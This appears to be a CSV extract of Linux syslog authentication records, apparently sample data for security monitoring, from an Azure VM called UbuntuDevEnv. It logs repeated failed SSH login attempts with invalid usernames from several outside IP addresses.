+11466,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:28:41,UbuntuDevEnv,2019-06-26 00:28:41,auth,UbuntuDevEnv,info,Received disconnect from 104.248.121.67 port 55087:11: Bye Bye [preauth],73115,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,104.248.121.6,55087,,
+11467,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:28:56,UbuntuDevEnv,2019-06-26 00:28:56,auth,UbuntuDevEnv,info,Invalid user cible from 131.100.219.3 port 54102,73178,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,cible,131.100.219.3,54102,,
+11468,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:28:56,UbuntuDevEnv,2019-06-26 00:28:56,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=131.100.219.3,73178,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,131.100.219.3,,0,
+11469,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:28:56,UbuntuDevEnv,2019-06-26 00:28:56,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,73178,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11470,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:28:58,UbuntuDevEnv,2019-06-26 00:28:57,auth,UbuntuDevEnv,info,Failed password for invalid user cible from 131.100.219.3 port 54102 ssh2,73178,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,cible,131.100.219.3,54102,,
+11471,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:28:58,UbuntuDevEnv,2019-06-26 00:28:57,auth,UbuntuDevEnv,info,Received disconnect from 131.100.219.3 port 54102:11: Bye Bye [preauth],73178,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,131.100.219.3,54102,,
+11472,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:28:58,UbuntuDevEnv,2019-06-26 00:28:57,auth,UbuntuDevEnv,info,Disconnected from invalid user cible 131.100.219.3 port 54102 [preauth],73178,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,cible,131.100.219.3,54102,,
+11473,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:29:00,UbuntuDevEnv,2019-06-26 00:29:00,auth,UbuntuDevEnv,info,Connection closed by 34.76.193.165 port 34098 [preauth],73186,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,34.76.193.1,34098,,
+11474,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:29:09,UbuntuDevEnv,2019-06-26 00:29:08,auth,UbuntuDevEnv,info,Invalid user lucien from 114.112.81.180 port 34348,73220,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,lucien,114.112.81.1,34348,,
+11475,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:29:09,UbuntuDevEnv,2019-06-26 00:29:08,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=114.112.81.180,73220,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,114.112.81.1,,0,
+11476,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:29:09,UbuntuDevEnv,2019-06-26 00:29:08,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,73220,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11477,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:29:10,UbuntuDevEnv,2019-06-26 00:29:10,auth,UbuntuDevEnv,info,Failed password for invalid user lucien from 114.112.81.180 port 34348 ssh2,73220,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,lucien,114.112.81.1,34348,,
+11478,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:29:11,UbuntuDevEnv,2019-06-26 00:29:10,auth,UbuntuDevEnv,info,Disconnected from invalid user lucien 114.112.81.180 port 34348 [preauth],73220,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,lucien,114.112.81.1,34348,,
+11479,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:29:11,UbuntuDevEnv,2019-06-26 00:29:10,auth,UbuntuDevEnv,info,Received disconnect from 114.112.81.180 port 34348:11: Bye Bye [preauth],73220,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,114.112.81.1,34348,,
+11480,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:29:18,UbuntuDevEnv,2019-06-26 00:29:18,auth,UbuntuDevEnv,info,Invalid user sean from 118.222.146.186 port 37784,73255,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sean,118.222.146.1,37784,,
+11481,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:29:18,UbuntuDevEnv,2019-06-26 00:29:18,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=118.222.146.186,73255,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,118.222.146.1,,0,
+11482,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:29:18,UbuntuDevEnv,2019-06-26 00:29:18,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,73255,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11483,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:29:20,UbuntuDevEnv,2019-06-26 00:29:19,auth,UbuntuDevEnv,info,Failed password for invalid user sean from 118.222.146.186 port 37784 ssh2,73255,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sean,118.222.146.1,37784,,
+11484,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:29:20,UbuntuDevEnv,2019-06-26 00:29:20,auth,UbuntuDevEnv,info,Disconnected from invalid user sean 118.222.146.186 port 37784 [preauth],73255,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sean,118.222.146.1,37784,,
+11485,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:29:20,UbuntuDevEnv,2019-06-26 00:29:20,auth,UbuntuDevEnv,info,Received disconnect from 118.222.146.186 port 37784:11: Bye Bye [preauth],73255,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,118.222.146.1,37784,,
+11486,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:30:05,UbuntuDevEnv,2019-06-26 00:30:05,auth,UbuntuDevEnv,info,Invalid user yong from 88.247.110.88 port 64635,73452,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,yong,88.247.110.8,64635,,
+11487,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:30:05,UbuntuDevEnv,2019-06-26 00:30:05,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=88.247.110.88,73452,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,88.247.110.8,,0,
+11488,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:30:05,UbuntuDevEnv,2019-06-26 00:30:05,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,73452,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11489,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:30:07,UbuntuDevEnv,2019-06-26 00:30:06,auth,UbuntuDevEnv,info,Failed password for invalid user yong from 88.247.110.88 port 64635 ssh2,73452,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,yong,88.247.110.8,64635,,
+11490,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:30:07,UbuntuDevEnv,2019-06-26 00:30:06,auth,UbuntuDevEnv,info,Received disconnect from 88.247.110.88 port 64635:11: Bye Bye [preauth],73452,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,88.247.110.8,64635,,
+11491,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:30:07,UbuntuDevEnv,2019-06-26 00:30:06,auth,UbuntuDevEnv,info,Disconnected from invalid user yong 88.247.110.88 port 64635 [preauth],73452,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,yong,88.247.110.8,64635,,
+11492,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:30:08,UbuntuDevEnv,2019-06-26 00:30:07,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=186.31.116.78,73462,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,186.31.116.7,,0,
+11493,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:30:08,UbuntuDevEnv,2019-06-26 00:30:07,auth,UbuntuDevEnv,info,Invalid user nagios from 186.31.116.78 port 35038,73462,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nagios,186.31.116.7,35038,,
+11494,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:30:08,UbuntuDevEnv,2019-06-26 00:30:07,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,73462,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11495,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:30:10,UbuntuDevEnv,2019-06-26 00:30:09,auth,UbuntuDevEnv,info,Failed password for invalid user nagios from 186.31.116.78 port 35038 ssh2,73462,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nagios,186.31.116.7,35038,,
+11496,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:30:10,UbuntuDevEnv,2019-06-26 00:30:09,auth,UbuntuDevEnv,info,Invalid user testftp from 104.248.121.67 port 35292,73476,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,testftp,104.248.121.6,35292,,
+11497,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:30:10,UbuntuDevEnv,2019-06-26 00:30:09,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,73476,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11498,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:30:10,UbuntuDevEnv,2019-06-26 00:30:09,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=104.248.121.67,73476,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,104.248.121.6,,0,
+11499,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:30:10,UbuntuDevEnv,2019-06-26 00:30:09,auth,UbuntuDevEnv,info,Received disconnect from 186.31.116.78 port 35038:11: Bye Bye [preauth],73462,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,186.31.116.7,35038,,
+11500,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:30:10,UbuntuDevEnv,2019-06-26 00:30:09,auth,UbuntuDevEnv,info,Disconnected from invalid user nagios 186.31.116.78 port 35038 [preauth],73462,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nagios,186.31.116.7,35038,,
+11501,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:30:11,UbuntuDevEnv,2019-06-26 00:30:11,auth,UbuntuDevEnv,info,Failed password for invalid user testftp from 104.248.121.67 port 35292 ssh2,73476,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,testftp,104.248.121.6,35292,,
+11502,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:30:11,UbuntuDevEnv,2019-06-26 00:30:11,auth,UbuntuDevEnv,info,Disconnected from invalid user testftp 104.248.121.67 port 35292 [preauth],73476,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,testftp,104.248.121.6,35292,,
+11503,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:30:11,UbuntuDevEnv,2019-06-26 00:30:11,auth,UbuntuDevEnv,info,Received disconnect from 104.248.121.67 port 35292:11: Bye Bye [preauth],73476,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,104.248.121.6,35292,,
+11504,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:30:54,UbuntuDevEnv,2019-06-26 00:30:53,auth,UbuntuDevEnv,info,Invalid user sandy from 114.112.81.180 port 53366,73687,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sandy,114.112.81.1,53366,,
+11505,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:30:54,UbuntuDevEnv,2019-06-26 00:30:53,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=114.112.81.180,73687,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,114.112.81.1,,0,
+11506,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:30:54,UbuntuDevEnv,2019-06-26 00:30:53,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,73687,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11507,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:30:56,UbuntuDevEnv,2019-06-26 00:30:55,auth,UbuntuDevEnv,info,Failed password for invalid user sandy from 114.112.81.180 port 53366 ssh2,73687,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sandy,114.112.81.1,53366,,
+11508,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:30:56,UbuntuDevEnv,2019-06-26 00:30:55,auth,UbuntuDevEnv,info,Disconnected from invalid user sandy 114.112.81.180 port 53366 [preauth],73687,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sandy,114.112.81.1,53366,,
+11509,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:30:56,UbuntuDevEnv,2019-06-26 00:30:55,auth,UbuntuDevEnv,info,Received disconnect from 114.112.81.180 port 53366:11: Bye Bye [preauth],73687,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,114.112.81.1,53366,,
+11510,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:30:57,UbuntuDevEnv,2019-06-26 00:30:56,auth,UbuntuDevEnv,info,Invalid user dspace from 118.222.146.186 port 54548,73704,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,dspace,118.222.146.1,54548,,
+11511,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:30:57,UbuntuDevEnv,2019-06-26 00:30:56,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,73704,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11512,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:30:57,UbuntuDevEnv,2019-06-26 00:30:56,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=118.222.146.186,73704,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,118.222.146.1,,0,
+11513,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:30:59,UbuntuDevEnv,2019-06-26 00:30:59,auth,UbuntuDevEnv,info,Failed password for invalid user dspace from 118.222.146.186 port 54548 ssh2,73704,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,dspace,118.222.146.1,54548,,
+11514,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:30:59,UbuntuDevEnv,2019-06-26 00:30:59,auth,UbuntuDevEnv,info,Disconnected from invalid user dspace 118.222.146.186 port 54548 [preauth],73704,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,dspace,118.222.146.1,54548,,
+11515,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:30:59,UbuntuDevEnv,2019-06-26 00:30:59,auth,UbuntuDevEnv,info,Received disconnect from 118.222.146.186 port 54548:11: Bye Bye [preauth],73704,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,118.222.146.1,54548,,
+11516,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:31:13,UbuntuDevEnv,2019-06-26 00:31:13,auth,UbuntuDevEnv,info,Invalid user apache from 131.100.219.3 port 42270,73761,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,apache,131.100.219.3,42270,,
+11517,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:31:13,UbuntuDevEnv,2019-06-26 00:31:13,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=131.100.219.3,73761,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,131.100.219.3,,0,
+11518,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:31:13,UbuntuDevEnv,2019-06-26 00:31:13,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,73761,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11519,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:31:15,UbuntuDevEnv,2019-06-26 00:31:15,auth,UbuntuDevEnv,info,Failed password for invalid user apache from 131.100.219.3 port 42270 ssh2,73761,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,apache,131.100.219.3,42270,,
+11520,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:31:16,UbuntuDevEnv,2019-06-26 00:31:15,auth,UbuntuDevEnv,info,Disconnected from invalid user apache 131.100.219.3 port 42270 [preauth],73761,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,apache,131.100.219.3,42270,,
+11521,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:31:16,UbuntuDevEnv,2019-06-26 00:31:15,auth,UbuntuDevEnv,info,Received disconnect from 131.100.219.3 port 42270:11: Bye Bye [preauth],73761,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,131.100.219.3,42270,,
+11522,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:31:37,UbuntuDevEnv,2019-06-26 00:31:36,auth,UbuntuDevEnv,info,Invalid user zg from 104.248.121.67 port 43732,73845,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,zg,104.248.121.6,43732,,
+11523,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:31:37,UbuntuDevEnv,2019-06-26 00:31:36,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,73845,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11524,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:31:37,UbuntuDevEnv,2019-06-26 00:31:36,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=104.248.121.67,73845,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,104.248.121.6,,0,
+11525,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:31:39,UbuntuDevEnv,2019-06-26 00:31:38,auth,UbuntuDevEnv,info,Failed password for invalid user zg from 104.248.121.67 port 43732 ssh2,73845,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,zg,104.248.121.6,43732,,
